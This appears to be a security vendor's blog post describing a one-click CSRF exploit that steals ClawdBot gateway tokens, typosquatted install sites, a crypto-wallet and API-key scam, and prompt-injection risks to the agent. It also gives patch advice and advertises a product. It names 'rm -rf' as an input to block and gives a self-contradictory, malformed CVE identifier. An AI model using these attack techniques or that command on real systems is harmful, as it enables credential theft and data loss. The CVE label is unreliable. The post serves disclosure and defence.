Oh Clawp! A 1-Click ClawdBot Exploit leads to RCE over GatewayUrl exfiltrating single-layer authentication Token & Typosquatting campaigns

Authors: Reyben T. Cortes, Azim Uddin, Abdullah Mamun, ThreatCluster, DefusedCyber

Happy Monday! Unless you've been living under a rock, we're tracking the development of one of the most controversial conversations in the security community regarding the release of ClawdBot, that is what we will only call it for today. While this isn't the first iteration, this agentic tool unloads a can of worms into your local system by crawling every single crevice of files and API credentials storing it in an .md file to learn everything it needs to be an effective personal assistant the type that Copilot dreams itself to be at night. As this continue to viral in the next few weeks we are tracking Japan & APAC - Asia Pacific customers that could be affected by the unassigned exploitable vulnerability under the affected versions we will uncover closely below.

Asia-Pacific: 9,996+

The Clawdbot RCE Vulnerability

On January 26, autonomous hackbot agents at ethiack discovered an input validation request in Clawdbots WebSocket gatewayURL. This allows the frontend JavaScript UI to "allow" gatewayurl parameters where token is stored in local storage. Because this did not get an assigned CVE - Common Vulnerability Exposure identifier it is important to note that this exploitable endpoint target is exposed to every single instance we discovered primarily over gateway port:18789. However to exfiltrate the locally stored credential a targeted victim must visit an attacker controlled website containing the exploit payload. This is known as a CSRF - Cross Site Request Forgery attack. Nonetheless, this means CVSS score we built for this is still attack vector: Network.

CVE-2026-8cb0fa9

CVSS 9.6

CWE-352 (CSRF - Cross Site Request Forgery)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

This is an example of the WebSocket which such utilization does not support sanitization to CORS between unknown browsers such as an attacker controlled website. Implementing a normal HTTP request prevents this otherwise. Instead, Clawdbot created the resource function via WebSocket which does not support protection mechanisms against CORS - Cross Origin resource sharing - forbidding browsers from communicating each other especially for incoming request such as the gatewayURL. Hence, CSRF - Cross Site Request Forgery to a forbidden resource. This allows a GET request to a victims local storage like your Clawdbot authentication tokens.

Typosquatting & Crypto Fraud Campaigns

As the Clawdbot craze began to peak, we discovered malicious campaigns also reported by users which attempts to cleverly trick the victim in executing the Clawdbot install.sh installation script from a one letter typosquatted domain which victims can easily enter. The fake domain was impersonating as the legitimate installation site for Clawdbot as demonstrated in figure 3. We also checked the sites alleged social media platforms for credibility however they were all banned except telegram, if anyone wants to take a crack. t[.]me/openclawd

Interestingly, we received a submission of a user in Japan our APAC region attempting to take a shortcut and hand over their crypto wallets and Anthropic API keys as a service to build the Clawdbot agent in 2 minutes. This appears highly suspicious charging 0.005ETH which is around $12USD after connecting the victims wallet including your API keys!

Windows Powershell

MacOS/Linux

Npm

pnpm

Git Clone

Security Fixes & Recommendations

Implement Safe Claw security scanning as demonstrated, users have reported that all skills were vulnerable to 50 different security risks such as prompt injections, malicious commands, and data exfiltration. External audits also reported over 150 vulnerabilities and 8 critical risks with 97% injection success rate reported by zeroleaks. These findings suggest you really should be running this internally only without the agent touching or calling to external sources outside your local system such as parsing your emails or chat groups to be able to directly interact with your Clawd agent.

Vulnerable Ranges

Conclusion

This is not the first iteration of such a controversial agentic tool, back in October 2025 Microsoft introduced one of the most concerning features into Copilot which basically attempts to do what Clawdbot has been trying to do, "collect it all, know it all" regardless of plaintext storage. We encourage organizations and local users exposing such Clawdbot instances to the internet to create a cron job for staying up to date and releases on the platform as more users and organizations continue to experiment the tool. Such instances should be Sandbox and run in TailScale environment which prevents exposure of the gateway port:18789 directly to the internet. Ensure to upgrade to the latest ≥v2026.1.29 versions to patch against the 1-click vulnerability exploit all versions below ≤v2026.1.28. In addition, we discovered clever typosquatting domains and fake Clawdbot deployment services to connect to victim wallets and steal Anthropic API keys in the process. Automate security hardening with tools such as safe claw to block dangerous inputs like rm -rf. We included indicators of the malicious domains below and created detection rules to detect possible exfiltration of a CSRF attack including detecting possible exfiltration of auth tokens.

RiskSensor Solution: Real Time Identification

If you are looking for real-time identification RiskSensor our 2025 award winning solution quickly validates your attack surface across all your environments. In conjunction with our proactive threat research team Unit Zero we have informed vulnerable organizations to patch against the 1-click Clawdbot RCE exploit to proactively protect our customers in Japan and APAC - Asia Pacific Wide.

KQL Detection Rule

1-Click CSRF Moltbot Malicious GET Request & Token Exfiltration

Indicators & C2 domains

References

https://ethiack.com/news/blog/one-click-rce-moltbot

https://github.com/openclaw/openclaw/commit/8cb0fa993ba0ba4a3e24c2a9e0416ab2ca796dcf

https://x.com/mischavdburg/status/2017500389436715239

https://ransomleak.com/exercises/clawdbot-prompt-injection

https://echo.websocket.org/

https://openclaw.ai/